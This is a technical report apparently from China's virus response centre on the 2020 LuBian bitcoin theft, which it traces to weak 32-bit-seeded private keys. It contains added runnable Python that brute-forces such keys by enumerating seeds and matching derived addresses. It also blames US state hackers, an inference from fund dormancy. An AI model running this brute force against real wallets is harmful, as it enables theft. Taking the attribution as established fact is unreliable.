Technical Traceability Analysis of the Large-Scale Bitcoin Theft at the LuBian Mining Pool


Author: National Computer Virus Emergency Response Centre
On 29 December 2020, the LuBian mining pool suffered a major hacker attack in which a total of 127272.06953176 BTC (worth about $3.5 billion at the time, and about $15 billion today) was stolen. The holder of this large amount of bitcoin was Chen Zhi, chairman of Cambodia's Prince Group.
After the attack, Chen Zhi and his Prince Group posted messages on the blockchain in early 2021 and in July 2022, calling on the hackers to return the stolen bitcoin and offering to pay a reward, but received no response.
Strangely, the large amount of stolen bitcoin then sat in the attackers' hands for four years almost untouched. This is clearly inconsistent with an ordinary hacker's eagerness to cash out and looks more like a precise operation run by a "state-level hacking organization". Not until June 2024 was the stolen bitcoin transferred again, to new bitcoin wallet addresses, where it remains intact.
On 14 October 2025, the United States Department of Justice announced criminal charges against Chen Zhi and claimed the forfeiture of 127,000 bitcoin from Chen Zhi and his Prince Group. The evidence suggests that the bitcoin the United States Government seized from Chen Zhi and his Prince Group are precisely the LuBian mining pool bitcoin that hackers stole in 2020. In other words, the United States Government may have obtained the 127,000 bitcoin held by Chen Zhi through hacking techniques as early as 2020, a classic "black eats black" operation by a state-level hacking organization.
From a technical standpoint, this report analyses the key technical details of the incident in depth, tracing the provenance of the stolen bitcoin, reconstructing the full timeline of the attack and assessing Bitcoin's security mechanisms, in the hope of offering valuable security insight to the cryptocurrency industry and its users.
The LuBian mining pool was established in early 2020 as a fast-growing bitcoin mining pool with its main operating bases in China and Iran. In December 2020 it suffered a large-scale hacker attack that resulted in the theft of more than 90 per cent of its bitcoin holdings. The total amount stolen was 127272.06953176 BTC, which largely matches the 127,271 BTC stated in the United States Department of Justice indictment.
The LuBian mining pool's operating model included centralized custody and distribution of mining rewards. Its bitcoin were not held at a regulated centralized exchange but in non-custodial wallets. Technically, non-custodial wallets (including cold wallets and hardware wallets) are regarded as the ultimate safe haven for crypto assets: unlike an exchange account, which can be frozen by a court order, they are more like a bank vault that belongs to the holder alone, with the key (the private key) held only by the holder.
Bitcoin is a cryptocurrency whose on-chain addresses identify the ownership and movement of bitcoin assets, and whoever holds the private key of an address fully controls the bitcoin at that address. According to blockchain analysis firms, the huge amount of bitcoin now controlled by the United States Government coincides with the bitcoin stolen in the LuBian mining pool hack.
On-chain data show that on 29 December 2020, Beijing time, a total of 127272.06953176 BTC was abnormally transferred out of LuBian's core bitcoin wallet addresses, largely matching the 127,271 BTC stated in the United States Department of Justice indictment. After that abnormal transfer the stolen bitcoin remained dormant until June 2024.
Between 22 June and 23 July 2024, Beijing time, the stolen bitcoin was transferred again to new on-chain addresses, where it remains intact. Arkham, a well-known United States blockchain tracking platform, has labelled these final addresses as held by the United States Government. To date, the United States Government has not disclosed in its indictment how it obtained the private keys to this very large amount of bitcoin.

Figure 1: Timeline of key activity
It is well known that in the blockchain world, random numbers are the cornerstone of cryptographic security. Bitcoin uses asymmetric cryptography, and a bitcoin private key is a 256-bit random number, so a brute-force search would in theory require on the order of 2^256 attempts, which is practically impossible. But if those 256 bits are not all generated randomly, for example if 224 of them follow a rule that can be deduced and only 32 are actually random, the strength of the private key collapses: only 2^32 (about 4.29 billion) attempts are needed to brute-force it. For example, in September 2022 the UK crypto market maker Wintermute lost about $160 million to a weak-pseudo-randomness vulnerability.
In August 2023, the overseas security research team behind MilkSad first published a pseudo-random number generator (PRNG) vulnerability in a third-party key-generation tool and obtained a CVE identifier for it (CVE-2023-39910). The team's published research pointed to the same class of vulnerability in the hacked LuBian mining pool addresses; the 25 bitcoin addresses listed in the United States Department of Justice indictment are all found among the LuBian mining pool addresses that were hacked.

Figure 2: The 25 bitcoin wallet addresses listed in the United States Department of Justice indictment
The LuBian mining pool, as a non-custodial wallet system, relied on a custom private-key generation algorithm to manage its funds. Instead of the recommended 256-bit random number, its private-key generation relied on a 32-bit random number, which is a fatal flaw: a "simplified random generator" (MT19937-32) seeded only with a timestamp or other weak input. The output of such a pseudo-random number generator (PRNG) carries no more randomness than a single 4-byte integer, which modern hardware can exhaust efficiently. Mathematically, the key space is only 2^32; if an attack script tests 10^6 keys per second, exhausting it takes about 4,300 seconds (roughly 1.2 hours). In practice, optimized tools such as Hashcat or custom scripts can speed this up further. The attackers exploited this flaw to steal the huge amount of bitcoin from the LuBian mining pool.

Figure 3: Comparison of the LuBian mining pool's deficiencies with industry security standards
The complete timeline and details of the LuBian mining pool hack, as reconstructed by technical traceability, are as follows:
1. Attack and theft phase: 29 December 2020, Beijing time
Event: Exploiting the weak-pseudo-randomness flaw in the private-key generation of the LuBian mining pool's bitcoin wallet addresses, the hackers brute-forced the private keys of more than 5,000 weak-random wallet addresses (address type: P2WPKH nested in P2SH, prefix 3). Within roughly two hours, about 127272.06953176 BTC (then worth roughly $3.5 billion) was drained from these addresses, leaving less than 200 BTC behind. All of the suspicious transactions share the same transaction fee, indicating that the attack was carried out by an automated batch-transfer script.
Sender: the LuBian mining pool's group of weak-random bitcoin wallet addresses (controlled by the pool's operating entity, which belongs to Chen Zhi's Prince Group)
Receiver: group of bitcoin wallet addresses controlled by the attacker (addresses not disclosed)
Transfer path: weak wallet address group → attacker wallet address group
Linkage analysis: the total amount stolen is 127272.06953176 BTC, broadly consistent with the 127,271 BTC claimed in the United States Department of Justice indictment.
2. Dormancy phase: 30 December 2020 to 22 June 2024, Beijing time
Event: After being stolen through the weak-pseudo-randomness flaw in 2020, the bitcoin sat dormant in the attacker's wallets for four years; apart from a handful of dust transactions (less than one ten-thousandth of the total), probably used for testing, nothing moved.
Linkage analysis: the bitcoin remained almost untouched until 22 June 2024, when all of it came under the control of the United States Government. This is clearly at odds with an ordinary hacker's eagerness to cash out and looks more like the precise operation of a state-level hacking organization.
3. Recovery attempt phase: early 2021 and 4 to 26 July 2022, Beijing time
Event: During the dormancy phase, in early 2021, the LuBian mining pool sent more than 1,500 messages through Bitcoin's OP_RETURN function (paying about 1.4 BTC in fees), embedding them in the blockchain data field and pleading with the hackers to return the funds. Example message: "Please return our funds, we'll pay a reward". On 4 and 26 July 2022 the LuBian mining pool again sent messages via OP_RETURN, for example: "MSG from LB. To the whitehat who is saving our asset, you can contact us through 1228btc@gmail.com to discuss the return of asset and your reward."
Sender: LuBian's weak-random bitcoin wallet addresses (controlled by the pool's operating entity, under Chen Zhi's Prince Group)
Receiver: group of bitcoin wallet addresses controlled by the attacker
Transfer path: weak wallet address group → attacker wallet address group (small transactions with the message embedded in OP_RETURN)
Linkage analysis: these messages confirm that after the theft the LuBian mining pool, as sender, repeatedly tried to contact the "third-party hacker" to request the return of the assets and negotiate a reward.
4. Activation and transfer phase: 22 June to 23 July 2024, Beijing time
Event: the bitcoin was moved out of dormancy from the attacker-controlled wallet addresses to a final set of wallet addresses. Arkham, a well-known blockchain tracking platform, has labelled these final addresses as controlled by the United States Government.
Sender: group of bitcoin wallet addresses controlled by the attacker
Receiver: new consolidated final wallet address group (not disclosed, but confirmed as addresses controlled by the United States Government)
Transfer path: attacker-controlled bitcoin wallet address group → final consolidated wallet address group
Linkage analysis: after four years of near-total silence, this batch of stolen bitcoin ultimately came under the control of the United States Government.
5. Public announcement and seizure phase: 14 October 2025, United States local time
Event: The United States Department of Justice issued a press release announcing charges against Chen Zhi and the "forfeiture" of the 127,000 bitcoin in his possession.
Because of the blockchain's public nature, all bitcoin transactions are open and traceable. This report accordingly traced the origin of the large amount of bitcoin stolen from LuBian's weak-random bitcoin wallet addresses (controlled by the pool's operating entity and possibly belonging to Chen Zhi's Prince Group). Of the 127272.06953176 BTC stolen in total, about 17,800 BTC came from independent mining, about 2,300 BTC from mining-pool payouts and about 107,100 BTC from exchanges and other sources; these preliminary findings do not match the illicit proceeds alleged in the United States Department of Justice indictment.
1. Private key generation for the bitcoin wallet addresses:
The core of the LuBian mining pool vulnerability is that its private-key generator has a "MilkSad"-style defect like the one found in Libbitcoin Explorer. Specifically, the system used the Mersenne Twister (MT19937-32) pseudo-random number generator initialized with a 32-bit seed, leaving only 32 bits of effective entropy. This PRNG is not cryptographically secure and is easy to predict and reverse. An attacker can enumerate every possible 32-bit seed (0 to 2^32-1), generate the corresponding private key for each, and check whether the resulting public key hash matches a known wallet address.
In the Bitcoin ecosystem the private-key generation process is usually: random seed → SHA-256 hash → ECDSA private key.
The LuBian mining pool's implementation may have been based on custom code or an open-source library (e.g. Libbitcoin) but neglected entropy security. As in the MilkSad vulnerability, Libbitcoin Explorer's "bx seed" command likewise used the MT19937-32 random number generator, seeded only with a timestamp or other weak input, which allows the private key to be brute-forced. In the LuBian attack more than 5,000 wallets were affected, indicating that the flaw was systemic and probably stemmed from reusing the same code when generating wallets in bulk.
2. Simulation of the attack process:
(1) Identify the target wallet addresses (by monitoring the LuBian mining pool's on-chain activity)
(2) Enumerate the 32-bit seed: for seed in 0 to 4294967295
(3) Generate the private key: private_key = SHA256(seed)
(4) Generate the public key and address: computed on the ECDSA secp256k1 curve
(5) Match: if the derived address matches a target, sign a transaction with the private key and transfer the funds out
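The five steps above carried through as a runnable model. This is an added example written for this page, not LuBian's code (which has never been published) and not the MilkSad team's tooling. The weak generator feeds a 32-bit seed into MT19937 and hashes its output into the ECDSA scalar, the brute force walks the seed space and derives the P2WPKH-nested-in-P2SH ("3...") address for each candidate, and a CSPRNG-based generator shows the fix that the conclusion of this report calls for. Assumptions: the seed-to-key mapping is a stand-in for the unknown LuBian derivation (Python's MT19937 seeding differs from C++ std::mt19937 and from bx seed); the victim seed 42 and the 100-seed search window are constructed so the example finishes in seconds; hash160 uses hashlib's ripemd160, which needs an OpenSSL build that provides it; full_search_seconds reproduces the 2^32 / 10^6 estimate from the entropy discussion above.

```python
"""Weak 32-bit-seed key generation vs. a CSPRNG, and the seed brute force.
Added example: a model of the flaw described in the text, not LuBian's code."""
import hashlib
import random
import secrets

# secp256k1 domain parameters
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)
B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def _add(p1, p2):
    """Affine point addition on secp256k1; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P


def pubkey_compressed(priv: int) -> bytes:
    """Scalar multiplication priv*G (double-and-add), SEC1 compressed encoding."""
    result, point, k = None, G, priv
    while k:
        if k & 1:
            result = _add(result, point)
        point = _add(point, point)
        k >>= 1
    x, y = result
    return (b"\x02" if y % 2 == 0 else b"\x03") + x.to_bytes(32, "big")


def hash160(data: bytes) -> bytes:
    """RIPEMD160(SHA256(data)); needs an OpenSSL build that exposes ripemd160."""
    return hashlib.new("ripemd160", hashlib.sha256(data).digest()).digest()


def base58check(payload: bytes) -> str:
    data = payload + hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    n, out = int.from_bytes(data, "big"), ""
    while n:
        n, r = divmod(n, 58)
        out = B58[r] + out
    return "1" * (len(data) - len(data.lstrip(b"\x00"))) + out


def p2sh_p2wpkh_address(pub: bytes) -> str:
    """P2WPKH nested in P2SH (the '3...' address type named in the report)."""
    redeem_script = b"\x00\x14" + hash160(pub)            # OP_0 <20-byte pubkey hash>
    return base58check(b"\x05" + hash160(redeem_script))  # version 0x05 -> '3'


def weak_private_key(seed32: int) -> int:
    """Flawed generator (model): the only entropy is a 32-bit seed fed to MT19937
    (Python's random module is MT19937); 256 bits of its output are hashed with
    SHA-256 into the scalar, so there are only 2**32 possible keys."""
    rng = random.Random(seed32 & 0xFFFFFFFF)
    material = b"".join(rng.getrandbits(32).to_bytes(4, "big") for _ in range(8))
    return int.from_bytes(hashlib.sha256(material).digest(), "big") % (N - 1) + 1


def strong_private_key() -> int:
    """Correct generator: 256 bits straight from the OS CSPRNG, never a seedable PRNG."""
    while True:
        k = int.from_bytes(secrets.token_bytes(32), "big")
        if 1 <= k < N:
            return k


def brute_force(target_address: str, seeds: range):
    """Steps 2-5 of the attack: enumerate seeds, derive the address, stop on a match."""
    for seed in seeds:
        priv = weak_private_key(seed)
        if p2sh_p2wpkh_address(pubkey_compressed(priv)) == target_address:
            return seed, priv
    return None


def full_search_seconds(keys_per_second: float) -> float:
    """Worst-case time to exhaust all 2**32 seeds at a given derivation rate."""
    return 2 ** 32 / keys_per_second


if __name__ == "__main__":
    victim_seed = 42  # constructed victim; a real target comes from step (1)
    victim_addr = p2sh_p2wpkh_address(pubkey_compressed(weak_private_key(victim_seed)))
    print("victim address:", victim_addr)
    print("recovered (seed, key):", brute_force(victim_addr, range(0, 100)))
    print("hours to exhaust 2**32 seeds at 1e6 keys/s: %.2f"
          % (full_search_seconds(1e6) / 3600))
```

Scaling the window to the full 2^32 seeds is purely a matter of throughput: the pure-Python curve arithmetic here manages a few hundred keys per second, whereas libsecp256k1 bindings or a GPU kernel reach the rates the text assumes. The defensive point is the last generator: with 256 bits drawn from the OS CSPRNG there is no seed to enumerate.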
Comparison with similar vulnerabilities: it resembles the 32-bit entropy flaw in Trust Wallet, which led to the compromise of bitcoin wallet addresses at scale, and the "MilkSad" flaw in Libbitcoin Explorer, whose low entropy exposed private keys. These cases stem from legacy code in early repositories that does not follow the BIP-39 standard (12 to 24 word seed phrases, providing high entropy). The LuBian mining pool may have used a custom algorithm designed to simplify management while neglecting security.
Defensive deficiencies: the LuBian mining pool lacked the multi-signature (multisig), hardware wallet or hierarchical deterministic (HD) wallet measures that could have strengthened security. On-chain data show that the attack covered many wallets, pointing to a systemic flaw rather than a single point of failure.
3. On-chain evidence and recovery attempts:
OP_RETURN messages: the LuBian mining pool sent more than 1,500 messages via Bitcoin's OP_RETURN, spending about 1.4 BTC in fees, pleading with the attackers to return the funds. Because they were sent from the victim addresses themselves and are embedded in the blockchain, these messages prove to be genuine acts of the owner rather than forgeries. Examples include "please return the funds" and similar pleas, spread across many transactions.
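How such a message is embedded, and how an investigator pulls it back out of a transaction's outputs, as an added example (not part of the original report). The encoder builds the zero-value `OP_RETURN <push> <data>` output script and enforces the 80-byte payload that was Bitcoin Core's default relay limit for many years; the decoder handles the direct push and the OP_PUSHDATA1/OP_PUSHDATA2 forms and rejects truncated scripts. The two sample outputs and the plea text are constructed for the example; they are not the LuBian transactions.

```python
"""Encode and decode Bitcoin OP_RETURN messages.
Added example; the sample transaction outputs below are constructed, not real."""

OP_RETURN = 0x6A
OP_PUSHDATA1 = 0x4C
OP_PUSHDATA2 = 0x4D
STANDARD_DATA_LIMIT = 80  # Bitcoin Core's long-standing default relay limit for the payload


def encode_op_return(message: bytes, allow_nonstandard: bool = False) -> bytes:
    """Build the scriptPubKey `OP_RETURN <push> <message>` of a zero-value output."""
    n = len(message)
    if n > STANDARD_DATA_LIMIT and not allow_nonstandard:
        raise ValueError(f"{n}-byte payload exceeds the {STANDARD_DATA_LIMIT}-byte relay limit")
    if n <= 0x4B:                      # direct push: the opcode byte is the length
        push = bytes([n])
    elif n <= 0xFF:
        push = bytes([OP_PUSHDATA1, n])
    else:
        push = bytes([OP_PUSHDATA2]) + n.to_bytes(2, "little")
    return bytes([OP_RETURN]) + push + message


def decode_op_return(script: bytes):
    """Return the payload of an OP_RETURN script, or None if it is not one."""
    if len(script) < 2 or script[0] != OP_RETURN:
        return None
    op = script[1]
    if 1 <= op <= 0x4B:
        start, length = 2, op
    elif op == OP_PUSHDATA1 and len(script) >= 3:
        start, length = 3, script[2]
    elif op == OP_PUSHDATA2 and len(script) >= 4:
        start, length = 4, int.from_bytes(script[2:4], "little")
    else:
        return None                    # no data push, or an unsupported push opcode
    payload = script[start:start + length]
    return payload if len(payload) == length else None   # reject truncated scripts


def find_messages(outputs):
    """Scan (value_sats, scriptPubKey) pairs and return decoded UTF-8 messages,
    the way one would sweep a victim address's transactions for OP_RETURN pleas."""
    messages = []
    for value, script in outputs:
        payload = decode_op_return(script)
        if payload is not None:
            messages.append((value, payload.decode("utf-8", errors="replace")))
    return messages


# Constructed sample: one OP_RETURN plea plus an ordinary P2SH change output.
SAMPLE_OUTPUTS = [
    (0, encode_op_return(b"Please return our funds, we'll pay a reward")),
    (12345, bytes.fromhex("a914" + "11" * 20 + "87")),   # OP_HASH160 <20 bytes> OP_EQUAL
]

if __name__ == "__main__":
    for value, msg in find_messages(SAMPLE_OUTPUTS):
        print(f"{value} sat: {msg}")
```

Running find_messages over every transaction spending from a victim address is all it takes to recover a campaign like the 1,500-message one described above; the fee the victim pays per message is the ordinary transaction fee, since the OP_RETURN output itself carries no value.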
4. Attribution analysis:
In its indictment of Chen Zhi (case No. 1:25-cr-00416) dated 14 October 2025, the United States Department of Justice listed 25 bitcoin wallet addresses holding approximately 127,271 BTC, worth about $15 billion in total, which have been seized. Blockchain analysis and a review of the official documents show that these addresses are closely tied to the attack on the LuBian mining pool:
Direct correlation: blockchain analysis shows that the 25 addresses in the United States Department of Justice indictment are the final holders of the bitcoin stolen in the 2020 attack on the LuBian mining pool. Elliptic reports that the bitcoin was "stolen" from the LuBian mining pool's mining operations in 2020. Arkham Intelligence confirmed that the funds seized by the United States Department of Justice are directly traceable to the LuBian theft.
Indictment evidence link: the United States Department of Justice indictment does not name the "LuBian hack" directly, but refers to funds originating from bitcoin mining operations in Iran and China that had been the target of a theft, which is consistent with the on-chain analysis by Elliptic and Arkham Intelligence.
Attack-method linkage: after the technical attack on the LuBian mining pool in 2020, the bitcoin lay dormant for four years, with only a trace of dust transactions (less than one ten-thousandth of the total), until it was taken over in full by the United States Government in 2024. This does not fit the profile of an ordinary hacker eager to cash out and looks more like the precision of a state-level hacking operation; the analysis therefore concludes that the bitcoin may have been under the control of the United States Government as early as December 2020.
Impact: the 2020 hack effectively dismantled the LuBian mining pool, with losses exceeding 90 per cent of its total assets at the time, while the present value of the stolen bitcoin has risen to $15 billion, highlighting the additional risk created by price volatility.
The LuBian mining pool incident exposed the systemic risk of weak random number generation in cryptocurrency tooling. To guard against similar vulnerabilities, the blockchain industry should use cryptographically secure random number generators (CSPRNGs); implement layered defences including multi-signature (multisig) wallets, cold storage and periodic audits; avoid custom private-key generation algorithms; and integrate mining pools into real-time on-chain monitoring and abnormal-transfer alerting. On the user side, ordinary users should avoid unaudited key-generation modules from open-source communities. The incident is also a reminder that even on a highly transparent blockchain, a weak security foundation has catastrophic consequences, and it reflects the importance of cybersecurity to the future development of the digital economy and digital currencies.